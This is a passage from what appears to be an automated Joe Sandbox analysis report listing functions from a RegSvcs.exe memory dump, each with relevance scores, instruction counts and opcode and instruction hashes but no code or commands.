                                                        • Instruction ID: 3527e5b777ae00019dc329ba41c29a52499991282711a8597c1887601c7144f9
                                                        • Opcode Fuzzy Hash: 128e1839285258c419fd9f30d6340c63aba8479057773991335c85770b300eae
                                                        • Instruction Fuzzy Hash: 46A11631E006259FEB21EB5CCC48BAEBBB5BF01724F054295EA00AB391D7789D41CBD1
                                                        Function 01660185 Relevance: .3, Instructions: 276COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2628868fae2405f36530e2200a6479bf5c245dfa41f9596bc09cec8cfafa18e6
                                                        • Instruction ID: 3ae864747dc35d5eb5d32098abe2c25de7b8d1120191a6674cb34fffe4964801
                                                        • Opcode Fuzzy Hash: 2628868fae2405f36530e2200a6479bf5c245dfa41f9596bc09cec8cfafa18e6
                                                        • Instruction Fuzzy Hash: 6BA18F71A01616DBEB25DF69CD90BAAB7A9FF54314F04403DEA4597381EB34E812CB90
                                                        Function 016F4500 Relevance: .3, Instructions: 275COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 62a9601b875959a5649f7509493015e7e36ebcaaae727c9843297f95c2ef848c
                                                        • Instruction ID: 10e7e14395306f0328872087e7d19858c1dcfa4ee0fc004b53fe51c8820764c5
                                                        • Opcode Fuzzy Hash: 62a9601b875959a5649f7509493015e7e36ebcaaae727c9843297f95c2ef848c
                                                        • Instruction Fuzzy Hash: 96A1CD72A056129FC721DF18CD80B6ABBEAFF88714F05492CF6859BB51CB34E901CB95
                                                        Function 016F2B57 Relevance: .3, Instructions: 266COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                        • Instruction ID: c876e3de4e49ff765372efbc5095f6f6456314a0517019185ce6f3f8b2ec08a0
                                                        • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                        • Instruction Fuzzy Hash: D4B11571E0061A9FDB29CFA9C890AADBBB5FF88310F14816DEA15A7354D730E941CF94
                                                        Function 016A60E0 Relevance: .3, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f0833b8430aa5a8ce002c45f3140018a7f68ffb3914291b17b287594caa0379d
                                                        • Instruction ID: 9c548cd10b645f9bec6e11f92875b960c25f9eaff6a5db3462edd7a9bbca3def
                                                        • Opcode Fuzzy Hash: f0833b8430aa5a8ce002c45f3140018a7f68ffb3914291b17b287594caa0379d
                                                        • Instruction Fuzzy Hash: A091A171D00216AFDB15CFA8DC94BAEBFB5AF48710F5941A9E610AB341D734ED018FA4
                                                        Function 0163E3F0 Relevance: .3, Instructions: 261COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8d08ba42322d732e12577b4c8c1a999441f3ec4b8547f22b57544b3360223f1a
                                                        • Instruction ID: 616beb3dbc6778b664b4d8b38242cf337d1281f3b313dec9d68e507b25581d2e
                                                        • Opcode Fuzzy Hash: 8d08ba42322d732e12577b4c8c1a999441f3ec4b8547f22b57544b3360223f1a
                                                        • Instruction Fuzzy Hash: BD914571A01216DBEB24EB5CCC40B79BBB2EFD8724F058569ED059B381E736D902CB61
                                                        Function 01676ACC Relevance: .2, Instructions: 226COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 21c3aaef74c5232278a3728bb2dd48cb6c4b8f2a278cf028b96d13097a833f14
                                                        • Instruction ID: 022202346f8f469fad5aa596878c09f9beb1fb8e57cde962f2da63f470dddaaa
                                                        • Opcode Fuzzy Hash: 21c3aaef74c5232278a3728bb2dd48cb6c4b8f2a278cf028b96d13097a833f14
                                                        • Instruction Fuzzy Hash: B88182B1A00A169FEB24CF69C940ABEBBF9FB48700F14852EE455E7740E734D951CBA4
                                                        Function 016EAB40 Relevance: .2, Instructions: 222COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                        • Instruction ID: 41f1f04cbb39e53541e452bd5c31426a8e9b7179fed7d8486ac8feabf07ef05e
                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                        • Instruction Fuzzy Hash: ED819172A012059FDF19CF98C898AAEBBF6BF84310F18866DD9169B344D774D911CB44
                                                        Function 0165E284 Relevance: .2, Instructions: 212COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 122db80ae53c561bbe5112dc9e856cad211a39ce0dfe096bddbb806abf45dfdf
                                                        • Instruction ID: 13c46929b403e44de5d29583776f161ec8fc72c7ed9f5e64699d7dfacb5cf2be
                                                        • Opcode Fuzzy Hash: 122db80ae53c561bbe5112dc9e856cad211a39ce0dfe096bddbb806abf45dfdf
                                                        • Instruction Fuzzy Hash: BB817C71A00609AFDF65CFA9CC80AEEFBBAFB88354F10442DE955A7211D731AD05CB60
                                                        Function 0163C640 Relevance: .2, Instructions: 206COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c9a58a0bfed002c3cd4ffb21b1f63a3264e3d6a8971f8cb03b1a1c9ba47116aa
                                                        • Instruction ID: 2cc57f6de0ec2f2537262dc7aada4be63025e71d43f855e6d777411e478de2de
                                                        • Opcode Fuzzy Hash: c9a58a0bfed002c3cd4ffb21b1f63a3264e3d6a8971f8cb03b1a1c9ba47116aa
                                                        • Instruction Fuzzy Hash: 2471CE75D04669DBCB26DF58CC90BBEBBB5FF98710F14821AE942AB350D7709801CBA0
                                                        Function 016D47A0 Relevance: .2, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 63570eaf87053ff5610b5b079cc706a99ae200feb29fdd78967d763c95e4ba03
                                                        • Instruction ID: ae05f736f7307935b4b0ec1b72852f0912a00951d49ce346b874a7bf10c98ee9
                                                        • Opcode Fuzzy Hash: 63570eaf87053ff5610b5b079cc706a99ae200feb29fdd78967d763c95e4ba03
                                                        • Instruction Fuzzy Hash: A9719F70D01205EFDB20CF5DDD45AAABBF9EB91710B05815EFA00AB658CB71DD80CB59
                                                        Function 0163260B Relevance: .2, Instructions: 201COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7004aa116b2bc2dc45250a15f36ea5bfe7665cefdac0af507811211e95a72139
                                                        • Instruction ID: 7d398a5e2002eba43e0ade38e5e4082f78e672cbccf8922da7f179543aede33b
                                                        • Opcode Fuzzy Hash: 7004aa116b2bc2dc45250a15f36ea5bfe7665cefdac0af507811211e95a72139
                                                        • Instruction Fuzzy Hash: CD71CF31A046528FD312DF2CC890B2AB7E6FFC5710F0885ADE8958B352DB34D846CB95
                                                        Function 016A035C Relevance: .2, Instructions: 198COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                        • Instruction ID: e403c160b5ae3c305ef3440644f79790940e673171110a7a32f361d189b7b095
                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                        • Instruction Fuzzy Hash: F0715C71A0061AAFDB10DFA9CD84A9EBBBAFF88700F504569E545E7250DB34EE01CF94
                                                        Function 016B62A0 Relevance: .2, Instructions: 198COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5581b752c62875234e3d1519cb6840a6493d106f2f9ac486912ad5da966dae4
                                                        • Instruction ID: 7d2759da3e417d8551ac45db08c5e6e0f6216bb58469353723f31d81106d6544
                                                        • Opcode Fuzzy Hash: e5581b752c62875234e3d1519cb6840a6493d106f2f9ac486912ad5da966dae4
                                                        • Instruction Fuzzy Hash: EF71E332241B01AFE732DF18CC94F96BBB6EF40724F14842CE656872A1D779E984CB50
                                                        Function 01628AA0 Relevance: .2, Instructions: 197COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a8751ac47de7da0414d9888351a151bc88e40223ec6b263ce58dd71c16a862f7
                                                        • Instruction ID: 0a90b5bd036825e13e66a9285cb6e2fa60ddc04ab32f1ee850d1e03972b69808
                                                        • Opcode Fuzzy Hash: a8751ac47de7da0414d9888351a151bc88e40223ec6b263ce58dd71c16a862f7
                                                        • Instruction Fuzzy Hash: A8818C72A043168BDB24DF9CDDA4B6DB7FABB48320F19822DD901AB381C7749941CB94
                                                        Function 016F8324 Relevance: .2, Instructions: 192COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f765375da1e71ca55ec22ed6b5f49cba3462187fc586b62d4b0eaf39f2c6945b
                                                        • Instruction ID: d1462d05d27c0d1d0e35a4a7e85ad7c06b23709f7834d01f782c09be16a939ec
                                                        • Opcode Fuzzy Hash: f765375da1e71ca55ec22ed6b5f49cba3462187fc586b62d4b0eaf39f2c6945b
                                                        • Instruction Fuzzy Hash: 3D71F572E0021AABDF16DB94CC81FAEBBB9FB04354F10416DE621A7290D774AA45CB94
                                                        Function 016DA250 Relevance: .2, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe6320159ca80fd8bc485de6d71253932a883a7b624e68ae2ad1256ff1b9b165
                                                        • Instruction ID: 03b88e38e32c9e88c0b6a7c6908814ce8b4e522a4323962b4b44d0469ccff163
                                                        • Opcode Fuzzy Hash: fe6320159ca80fd8bc485de6d71253932a883a7b624e68ae2ad1256ff1b9b165
                                                        • Instruction Fuzzy Hash: 7551CF72909612AFD721DEA8CC44E6BBBE9EBC9750F01092DFA40DB250D774ED05C7A2
                                                        Function 016C8350 Relevance: .2, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 524006e6b39ad7083f8f1a2ba966a3909e00f4ce9678b9b593f1111ff41b6406
                                                        • Instruction ID: e068137f2802661ce8219c44c428f8a8c999cc0a4d96abeb1a27d9f528546a23
                                                        • Opcode Fuzzy Hash: 524006e6b39ad7083f8f1a2ba966a3909e00f4ce9678b9b593f1111ff41b6406
                                                        • Instruction Fuzzy Hash: F9518A709007059BD731DF9AC884AABFBFDFF94B10F10861ED296976A1C7B0A945CB90
                                                        Function 0165E443 Relevance: .2, Instructions: 158COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cd8195e1256435247d2f0a5170072678abe13ccf12752bde6baef1a95e70dcec
                                                        • Instruction ID: 21eb06d41f731e57e34b7f86a29dfe2ff2a3019dce811ef52760985fd1c1687d
                                                        • Opcode Fuzzy Hash: cd8195e1256435247d2f0a5170072678abe13ccf12752bde6baef1a95e70dcec
                                                        • Instruction Fuzzy Hash: 71514971200A059FCB22EFA9CD80EAAB7BEFF54794F40046DE94297360D735EA41CB54
                                                        Function 016C4180 Relevance: .2, Instructions: 156COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2760353adb8f8ac4d9d6209577decbe20cd55f5e6dfeb9532ca289429992ba62
                                                        • Instruction ID: f32179fed5c886bff7b1a79377244a582af60b76067951201541e6172ce72e21
                                                        • Opcode Fuzzy Hash: 2760353adb8f8ac4d9d6209577decbe20cd55f5e6dfeb9532ca289429992ba62
                                                        • Instruction Fuzzy Hash: 3D5145716083028FD754DF2AC891A6BBBE6FFC8A14F44492DF589C7350EB34D9068B96
                                                        Function 016445B1 Relevance: .2, Instructions: 156COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                        • Instruction ID: 6a00cc6b9300ea75c806c1ccb20a24f0ff47e819058b8682470c586fe9ec3788
                                                        • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                        • Instruction Fuzzy Hash: 8451AE71E0021AABDF15DF98C841BFEBBBAAF44354F144169EA01AB340DB34DD45CBA4
                                                        Function 016AE9E0 Relevance: .2, Instructions: 154COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                        • Instruction ID: df21c0df117999644209f8f1acd06be9b094b5ddbdd72e65b8bc159bcdad68bf
                                                        • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                        • Instruction Fuzzy Hash: 2D51EB31D0021AEFDF11DF94CD98BAEBB79AF00314F514669DA1267290D7329D40CFA4
                                                        Function 016E8B28 Relevance: .2, Instructions: 152COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 13b74418473cd989d863daa5d5ffbecb637153babecc9f5d771b1b586ede1716
                                                        • Instruction ID: 5d7023f05a4a96c9456897ae9b764d9fa7ba9be8894af1dfcdca69672efeebc3
                                                        • Opcode Fuzzy Hash: 13b74418473cd989d863daa5d5ffbecb637153babecc9f5d771b1b586ede1716
                                                        • Instruction Fuzzy Hash: 9541D1707036119BDA29DB2DCD9CB3BBBDEEF91620F048718E9558B384DB34D811C690
                                                        Function 016ACBF0 Relevance: .1, Instructions: 148COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 83f9d6e7c19daab5321b1469ae9df5b915a8de8eae4b9d6ce58f23e7b1e82893
                                                        • Instruction ID: 7fcfe2220be78bd7fa584ea42673db60a2239e3904e6fd58ad0382af0354f35b
                                                        • Opcode Fuzzy Hash: 83f9d6e7c19daab5321b1469ae9df5b915a8de8eae4b9d6ce58f23e7b1e82893
                                                        • Instruction Fuzzy Hash: 78517B7290021ADFCB20EFA9CD909AEBBF9FB48364B908519E546A7304D770AD01CFD0
                                                        Function 0165A430 Relevance: .1, Instructions: 139COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a05032972cfe6bac4376c1ad44646059b14315ac946a2b2b547c1452be03c9f
                                                        • Instruction ID: 459d79047de12362de35d2fdee46c9573353eccb6deb25bbfc3284115c81f726
                                                        • Opcode Fuzzy Hash: 0a05032972cfe6bac4376c1ad44646059b14315ac946a2b2b547c1452be03c9f
                                                        • Instruction Fuzzy Hash: 604139716443129BCF65EFADDCA0FAA3B6AEB59718F00412CEF029B341D7B19802C795
                                                        Function 016EA9D3 Relevance: .1, Instructions: 139COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                        • Instruction ID: 25731a8af0a6e91cfb89719a6d9c18c50b4068224925179b1d56f8957256abe9
                                                        • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                        • Instruction Fuzzy Hash: A941D8716067169FDB25CF98CD88A6AB7EAFF90210B05472DED5287340EB30ED19C794
                                                        Function 016501F8 Relevance: .1, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 546987dcad1c498ab5279342411c9e79d226ecc577d66fd4caa93dbefc3a8293
                                                        • Instruction ID: 549f79feb8d927499f11617bd88ab0b902780ae32f8f330e544f66f22b1ff412
                                                        • Opcode Fuzzy Hash: 546987dcad1c498ab5279342411c9e79d226ecc577d66fd4caa93dbefc3a8293
                                                        • Instruction Fuzzy Hash: EC41893690021A9BDB54DFA8C840AEEBBB9AF48710F14816AFD15A7340D735DD42CBA8
                                                        Function 0164EBFC Relevance: .1, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 37724d1881b2b2b708040a65d83650aaa0ee5dbd34d1184b6b5115df40c8fccd
                                                        • Instruction ID: 64514c6c09e7f83c497c555227814ab84c19d465e267f4b76ac8963d51ff0a19
                                                        • Opcode Fuzzy Hash: 37724d1881b2b2b708040a65d83650aaa0ee5dbd34d1184b6b5115df40c8fccd
                                                        • Instruction Fuzzy Hash: 9041E4726043029FD721EF28CC80A27B7EAFF88224F00496DEA67C7351DB36E8458B54
                                                        Function 01662750 Relevance: .1, Instructions: 137COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                        • Instruction ID: 3953179b332e5914af633ccae4cf7351b9c6a04263c1b00be3bf22cc3885ffa6
                                                        • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                        • Instruction Fuzzy Hash: A1514775A016158FCB15CF99C880AAEF7F6FF84720F2481A9D915EB351D730AA42CB90
                                                        Function 01626154 Relevance: .1, Instructions: 133COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4d6976be4c986086d858ef8b7f7372ba26e8c5a6be1a982e7aed62a26cb34250
                                                        • Instruction ID: c363a290b220ddbbf2e617cbab8dba822527e4513cb25278fcb7e188674fb239
                                                        • Opcode Fuzzy Hash: 4d6976be4c986086d858ef8b7f7372ba26e8c5a6be1a982e7aed62a26cb34250
                                                        • Instruction Fuzzy Hash: 9D512670905626DBDB25DB2CCC10BA8BBB1FF12314F1482A9E929A77D1D774A981CF84
                                                        Function 01620BCD Relevance: .1, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 875237efb0db576cdadba43a0ae9736c69f4718deb36c483342246b4c320aa69
                                                        • Instruction ID: 2f670beee38e984a21f1e958648bb563047613ef7066689c697d15962c3d2862
                                                        • Opcode Fuzzy Hash: 875237efb0db576cdadba43a0ae9736c69f4718deb36c483342246b4c320aa69
                                                        • Instruction Fuzzy Hash: BB41A076A406289FDB21DF68CD40BEA77B9EF45740F0100A9E908AB341D734DE85CF95
                                                        Function 016E866E Relevance: .1, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                        • Instruction ID: 901f07b6d5d1972f02ab432b544172814d36648929a0c5e3621db966082a0f31
                                                        • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                        • Instruction Fuzzy Hash: 80419475B01115ABDF15DB99CC88ABFBBFEAF84600F1541A9E904A7341D770DD018BA0
                                                        Function 01620887 Relevance: .1, Instructions: 128COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67edd7190d05653a7d8a1c83615253c8d533b6b11070529a377c45c84d0bc549
                                                        • Instruction ID: bcb5afaf59b461532b34b43f98f1731f9db38cd5b66bcf611f6ae21a25064cca
